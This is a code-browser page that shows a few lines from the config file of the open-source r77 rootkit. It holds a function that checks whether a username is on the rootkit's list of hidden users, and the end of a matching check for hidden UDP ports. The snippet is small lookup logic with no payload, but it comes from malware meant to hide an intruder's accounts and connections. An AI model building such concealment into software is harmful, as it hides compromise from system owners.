MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / IsUserNameHidden

Function IsUserNameHidden

r77/Config.c:90–93  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

88 return Configuration && IntegerListContains(Configuration->HiddenUdpPorts, port);
89}
90BOOL IsUserNameHidden(LPCWSTR name)
91{
92 return Configuration && StringListContains(Configuration->HiddenUserNames, name);
93}

Calls 1

StringListContainsFunction · 0.85

Tested by

no test coverage detected